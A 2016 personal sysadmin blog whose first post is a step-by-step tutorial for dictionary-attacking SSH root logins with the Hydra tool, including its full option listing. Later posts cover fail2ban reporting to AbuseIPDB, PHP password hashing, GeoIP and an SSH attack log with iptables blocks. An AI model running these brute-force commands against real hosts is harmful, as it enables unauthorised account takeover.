Dedetok: My Experiences Notes

Thursday, October 27, 2016

Script Kiddies to use hydra

This is intended for Education purpose!
After researching how to defend our network, I want to share how to perform what they are doing. It is very easy to perform automatic password attack against various services. One of their tools is hydra. Chrome mark https://www.thc.org/ "The site ahead contains harmful programs" and Firefox mark it as "Reported Unwanted Software Page!". Who's care.... LOL
To install it
# apt-get install hydra
or
# yum install hydra
To create dictionary install British words
# apt-get install wbritish
or

# yum install words
You don't need to run this as root.
Create a directory (whatever you want). I use directory hydra.
$ mkdir hydra
$ cd hydra
Now create words file before running hydra.
$ cat /usr/share/dict/words > words.txt
You can perform ssh using
hydra -l root -P words.txt ssh://xxx.xxx.xxx.xxx
To get more option:
$ hydra -h
Hydra v8.0 (c) 2014 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes.

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvVd46] [service://server[:PORT][/OPT]]

Options:
-R        restore a previous aborted/crashed session
-S        perform an SSL connect
-s PORT   if the service is on a different default port, define it here
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE
-x MIN:MAX:CHARSET password bruteforce generation, type "-x -h" to get help
-e nsr    try "n" null password, "s" login as pass and/or "r" reversed login
-u        loop around users, not passwords (effective! implied with -x)
-C FILE   colon separated "login:pass" format, instead of -L/-P options
-M FILE   list of servers to attack, one entry per line, ':' to specify port
-o FILE   write found login/password pairs to FILE instead of stdout
-f / -F   exit when a login/pass pair is found (-M: -f per host, -F global)
-t TASKS run TASKS number of connects in parallel (per host, default: 16)
-w / -W TIME waittime for responses (32s) / between connects per thread
-4 / -6   prefer IPv4 (default) or IPv6 addresses
-v / -V / -d verbose mode / show login+pass for each attempt / debug mode
-q        do not print messages about connection erros
-U        service module usage details
server    the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
service   the service to crack (see below for supported protocols)
OPT       some service modules support additional input (-U for module help)

Supported services: asterisk cisco cisco-enable cvs firebird ftp ftps http[s]-{head|get} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres rdp redis rexec rlogin rsh s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp

Hydra is a tool to guess/crack valid login/password pairs. Licensed under AGPL
v3.0. The newest version is always available at http://www.thc.org/thc-hydra
Don't use in military or secret service organizations, or for illegal purposes.
These services were not compiled in: sapr3 afp ncp oracle.

Use HYDRA_PROXY_HTTP or HYDRA_PROXY - and if needed HYDRA_PROXY_AUTH - environment for a proxy setup.
E.g.: % export HYDRA_PROXY=socks5://127.0.0.1:9150 (or socks4:// or connect://)
       % export HYDRA_PROXY_HTTP=http://proxy:8080
       % export HYDRA_PROXY_AUTH=user:pass

Examples:
hydra -l user -P passlist.txt ftp://192.168.0.1
hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
hydra -l admin -p password ftp://[192.168.0.0/24]/
hydra -L logins.txt -P pws.txt -M targets.txt ssh
WARNING: FOR EDUCATION PURPOSE! DO IT ON YOUR LOCAL NETWORK AND WITH YOUR OWN RISK. DOING THIS IS ON PUBLIC NETWORK IS BREAKING A LAW!

Tuesday, October 25, 2016

fail2ban: autoreporting attack to www.abuseipdb.com

Create file /etc/fail2ban/action.d/abuseipdb.conf
# Fail2Ban configuration file
#
# Author: IGAM Muliarsa
#
#

# Action to report IP address to abuseipdb.com
# you must sign up in https://www.abuseipdb.com
# This action requires API_KEY
# https://www.abuseipdb.com/report/json?key=[API_KEY]&category=[CATEGORIES]&comment=[COMMENT]&ip=[IP]
#
# IMPORTANT:
#
# Reporting an IP of abuse is a serious complaint. Make sure that it is
# serious. Fail2ban developers and network owners recommend you only use this
# action for:
#   * The recidive where the IP has been banned multiple times
#   * Where maxretry has been set quite high, beyond the normal user typing
#     password incorrectly.
#   * For filters that have a low likelyhood of receiving human errors
#

[Definition]

# Option: actionstart
# Notes.: command executed once at the start of Fail2Ban.
# Values: CMD
#
actionstart =

# Option: actionstop
# Notes.: command executed once at the end of Fail2Ban
# Values: CMD
#
actionstop =

# Option: actioncheck
# Notes.: command executed once before each actionban command
# Values: CMD
#
actioncheck =

# Option: actionban
# Notes.: command executed when banning an IP. Take care that the
#          command is executed with Fail2Ban user rights.
# Tags:    See jail.conf(5) man page
# Values: CMD
#

actionban
 = curl --data 'key=<apikey>' --data 'category=<category>' 
--data 'ip=<ip>' --data-urlencode 'comment=<matches>' 
--user-agent 'fail2ban v0.8.12' 'https://www.abuseipdb.com/report/json'

# Option: actionunban
# Notes.: command executed when unbanning an IP. Take care that the
#          command is executed with Fail2Ban user rights.
# Tags:    See jail.conf(5) man page
# Values: CMD
#
actionunban =

[Init]

# Option: apikey
# Notes    your user apikey from abuseipdb.com user account
# Values: STRING Default: None
#
apikey = REPLACE_WITH_YOUR_API_KEY

# Option: service
# Notes    service name you are reporting on, typically aligns with filter name
# Values: STRING Default: None
#
#service =
Edit /etc/fail2ban/jail.conf
...
[sshd]

port    = ssh
logpath = %(sshd_log)s
backend = %(sshd_backend)s
enabled = true
filter = sshd
action = iptables-ipset-proto4[]
        mlocaldb[category=10]
        abuseipdb[category=4,18,22]
...
To find available category, follow this rule.
Restart your fail2ban.
Tested on Fail2ban 0.9.x

References:

https://www.abuseipdb.com/api.html

Thursday, October 13, 2016

PHP >= 5.5: password hashing

To hash password (using default algorithm bcrypt)

$mypass = "password";
$myhash = password_hash($mypass, PASSWORD_DEFAULT);

To verify password

$brutepass = "test";
password_verify ($brutepass, $myhash); // true or false

Storing password in database

"Therefore, it is recommended to store the result in a database column that can expand beyond 60 characters (255 characters would be a good choice)." Maybe varchar(255)

Reference:

http://www.php.net/manual/en/faq.passwords.php
http://id1.php.net/manual/en/book.password.php

Tuesday, October 11, 2016

PHP 5: GeoIP

Install PHP GeoIP

# apt-get install geoip-bin geoip-database geoip-database-extra php5-geoip php5-geos

Updating GeoIP database from SID (choose your mirror)

# wget http://kambing.ui.ac.id/debian/pool/main/g/geoip-database/geoip-database-extra_20160912-1_all.deb

# wget http://kambing.ui.ac.id/debian/pool/main/g/geoip-database/geoip-database_20160912-1_all.deb

# dpkg -i geoip-database_20160912-1_all.deb

# dpkg -i geoip-database-extra_20160912-1_all.deb

To convert IP to integer

$ip = ip2long('119.249.54.66');

To convert integer to IP

$hostip = long2ip($ip);

To get 3 chars country code

echo geoip_country_code3_by_name($hostip);

To get country name

echo geoip_country_name_by_name($hostip);

To get country code and region

echo var_dump(geoip_region_by_name($hostip))."<br>";

 Error: mod_fcgid: stderr: PHP Warning:  geoip_region_by_name(): Required database not available at /usr/share/GeoIP/GeoIPRegion.dat. ??? May be required subscription premium service ???

Reference:

http://www.php.net/manual/en/book.geoip.php

China DDOS SSH 2016-10-11 Involving 12 IPs

Log:
Oct 10 21:18:22 mars sshd[11737]: Bad protocol version identification 'test' from 183.129.160.229 port 50149
Oct 10 21:32:00 mars sshd[14650]: Received disconnect from 124.232.156.78: 11: Bye Bye [preauth]

Oct
 11 01:28:56 mars sshd[29033]: fatal: no matching cipher found: client 
aes128-cbc,blowfish-cbc,3des-cbc server 
aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com [preauth]

Oct 11 03:05:36 mars sshd[16159]: Did not receive identification string from 113.108.21.16
Oct 11 04:40:43 mars sshd[2440]: Received disconnect from 121.18.238.114: 11: [preauth]
Oct 11 04:43:11 mars sshd[2477]: Received disconnect from 119.249.54.75: 11: [preauth]
Oct 11 04:44:12 mars sshd[2482]: Received disconnect from 221.194.47.208: 11: [preauth]
Oct 11 04:45:11 mars sshd[2886]: Received disconnect from 221.194.47.229: 11: [preauth]
Oct 11 04:45:45 mars sshd[3419]: Received disconnect from 221.194.47.224: 11: [preauth]
Oct 11 04:52:32 mars sshd[4427]: Received disconnect from 221.194.47.249: 11: [preauth]
Oct 11 04:53:53 mars sshd[4433]: Received disconnect from 121.18.238.98: 11: [preauth]
Oct 11 04:56:15 mars sshd[5350]: Received disconnect from 119.249.54.68: 11: [preauth]
Oct 11 04:57:21 mars sshd[5384]: Received disconnect from 221.194.47.208: 11: [preauth]
Oct 11 04:57:52 mars sshd[5387]: Received disconnect from 121.18.238.104: 11: [preauth]
Oct 11 04:58:10 mars sshd[5390]: Received disconnect from 221.194.47.229: 11: [preauth]
Oct 11 05:02:36 mars sshd[6364]: Received disconnect from 221.194.47.249: 11: [preauth]
Oct 11 05:08:11 mars sshd[7341]: Received disconnect from 221.194.47.249: 11: [preauth]
Oct 11 05:09:53 mars sshd[7399]: Received disconnect from 119.249.54.68: 11: [preauth]
Oct 11 05:16:53 mars sshd[9285]: Received disconnect from 121.18.238.109: 11: [preauth]
Oct 11 05:18:51 mars sshd[9323]: Received disconnect from 119.249.54.75: 11: [preauth]
Oct 11 05:18:54 mars sshd[9325]: Received disconnect from 121.18.238.114: 11: [preauth]
Oct 11 05:25:45 mars sshd[11293]: Received disconnect from 221.194.47.224: 11: [preauth]
Oct 11 05:26:41 mars sshd[11297]: Received disconnect from 119.249.54.66: 11: [preauth]
Oct 11 05:29:04 mars sshd[11335]: Received disconnect from 221.194.47.229: 11: [preauth]
Oct 11 05:30:10 mars sshd[11717]: Received disconnect from 119.249.54.66: 11: [preauth]
Oct 11 05:31:35 mars sshd[12252]: Received disconnect from 121.18.238.104: 11: [preauth]
Oct 11 05:37:35 mars sshd[13232]: Received disconnect from 221.194.47.229: 11: [preauth]
Oct 11 05:40:48 mars sshd[14251]: Received disconnect from 121.18.238.104: 11: [preauth]
Oct 11 05:47:08 mars sshd[15236]: Received disconnect from 119.249.54.88: 11: [preauth]
Oct 11 05:51:46 mars sshd[16208]: Received disconnect from 121.18.238.104: 11: [preauth]
Oct 11 05:54:15 mars sshd[16266]: Received disconnect from 119.249.54.88: 11: [preauth]
Oct 11 05:57:01 mars sshd[17206]: Received disconnect from 121.18.238.98: 11: [preauth]
Oct 11 06:13:24 mars sshd[20155]: Connection closed by 221.194.47.208 [preauth]
Oct 11 06:16:53 mars sshd[21101]: Received disconnect from 121.18.238.104: 11: [preauth]
Oct 11 06:34:57 mars sshd[24362]: Received disconnect from 121.18.238.114: 11: [preauth]
Oct 11 06:40:53 mars sshd[26291]: Received disconnect from 119.249.54.68: 11: [preauth]
Oct 11 06:41:43 mars sshd[26296]: Received disconnect from 119.249.54.75: 11: [preauth]
Oct 11 06:41:58 mars sshd[26299]: Received disconnect from 221.194.47.249: 11: [preauth]
Oct 11 06:50:14 mars sshd[27709]: Received disconnect from 121.18.238.98: 11: [preauth]
Oct 11 07:55:39 mars sshd[8437]: Received disconnect from 119.249.54.88: 11: [preauth]
Oct 11 08:01:33 mars sshd[9618]: Received disconnect from 221.194.47.208: 11: [preauth]
Oct 11 08:03:14 mars sshd[9627]: Received disconnect from 121.18.238.104: 11: [preauth]
Oct 11 08:04:00 mars sshd[9632]: Received disconnect from 119.249.54.75: 11: [preauth]
Oct 10 21:18:22 mars sshd[11737]: Bad protocol version identification 'test' from 183.129.160.229 port 50149
Oct 10 21:32:00 mars sshd[14650]: Received disconnect from 124.232.156.78: 11: Bye Bye [preauth]

Oct
 11 01:28:56 mars sshd[29033]: fatal: no matching cipher found: client 
aes128-cbc,blowfish-cbc,3des-cbc server 
aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com [preauth]

119.249.54.66
119.249.54.68
119.249.54.75
119.249.54.88
121.18.238.104
121.18.238.109
121.18.238.114
121.18.238.98
221.194.47.208
221.194.47.224
221.194.47.229
221.194.47.249

Others IPs before attact begin:

113.108.21.16
Oct 11 03:05:36 mars sshd[16159]: Did not receive identification string from 113.108.21.16
124.232.156.78
Oct 10 21:32:00 mars sshd[14650]: Received disconnect from 124.232.156.78 : 11: Bye Bye [preauth]
183.129.160.229
Oct 11 03:05:36 mars sshd[16159]: Did not receive identification string from 113.108.21.16

Sequence for each IP attempt:

No	Time	From	Method Auth	No	Time	From	Method Auth
1	2016-10-11 4:40	121.18.238.114	: 11: [preauth]	21	2016-10-11 5:30	119.249.54.66	: 11: [preauth]
2	2016-10-11 4:43	119.249.54.75	: 11: [preauth]	22	2016-10-11 5:31	121.18.238.104	: 11: [preauth]
3	2016-10-11 4:44	221.194.47.208	: 11: [preauth]	23	2016-10-11 5:37	221.194.47.229	: 11: [preauth]
4	2016-10-11 4:45	221.194.47.229	: 11: [preauth]	24	2016-10-11 5:40	121.18.238.104	: 11: [preauth]
5	2016-10-11 4:45	221.194.47.224	: 11: [preauth]	25	2016-10-11 5:47	119.249.54.88	: 11: [preauth]
6	2016-10-11 4:52	221.194.47.249	: 11: [preauth]	26	2016-10-11 5:51	121.18.238.104	: 11: [preauth]
7	2016-10-11 4:53	121.18.238.98	: 11: [preauth]	27	2016-10-11 5:54	119.249.54.88	: 11: [preauth]
8	2016-10-11 4:56	119.249.54.68	: 11: [preauth]	28	2016-10-11 5:57	121.18.238.98	: 11: [preauth]
9	2016-10-11 4:57	221.194.47.208	: 11: [preauth]	29	2016-10-11 6:13	221.194.47.208	[preauth]
10	2016-10-11 4:57	121.18.238.104	: 11: [preauth]	30	2016-10-11 6:16	121.18.238.104	: 11: [preauth]
11	2016-10-11 4:58	221.194.47.229	: 11: [preauth]	31	2016-10-11 6:34	121.18.238.114	: 11: [preauth]
12	2016-10-11 5:02	221.194.47.249	: 11: [preauth]	32	2016-10-11 6:40	119.249.54.68	: 11: [preauth]
13	2016-10-11 5:08	221.194.47.249	: 11: [preauth]	33	2016-10-11 6:41	119.249.54.75	: 11: [preauth]
14	2016-10-11 5:09	119.249.54.68	: 11: [preauth]	34	2016-10-11 6:41	221.194.47.249	: 11: [preauth]
15	2016-10-11 5:16	121.18.238.109	: 11: [preauth]	35	2016-10-11 6:50	121.18.238.98	: 11: [preauth]
16	2016-10-11 5:18	119.249.54.75	: 11: [preauth]	36	2016-10-11 7:55	119.249.54.88	: 11: [preauth]
17	2016-10-11 5:18	121.18.238.114	: 11: [preauth]	37	2016-10-11 8:01	221.194.47.208	: 11: [preauth]
18	2016-10-11 5:25	221.194.47.224	: 11: [preauth]	38	2016-10-11 8:03	121.18.238.104	: 11: [preauth]
19	2016-10-11 5:26	119.249.54.66	: 11: [preauth]	39	2016-10-11 8:04	119.249.54.75	: 11: [preauth]
20	2016-10-11 5:29	221.194.47.229	: 11: [preauth]

It is better to block those IP in block /24:
For iptables:
# iptables -A INPUT -p tcp -m tcp --dport 22 -s 119.249.54.0/24 -j DROP
# iptables -A INPUT -p tcp -m tcp --dport 22 -s 121.18.238.0/24 -j DROP
# iptables -A INPUT -p tcp -m tcp --dport 22 -s 221.194.47.0/24 -j DROP
If you don't have business with them just block all incoming connection from them:
# iptables -A INPUT -s 119.249.54.0/24 -j DROP
# iptables -A INPUT -s 121.18.238.0/24 -j DROP
# iptables -A INPUT s 221.194.47.0/24 -j DROP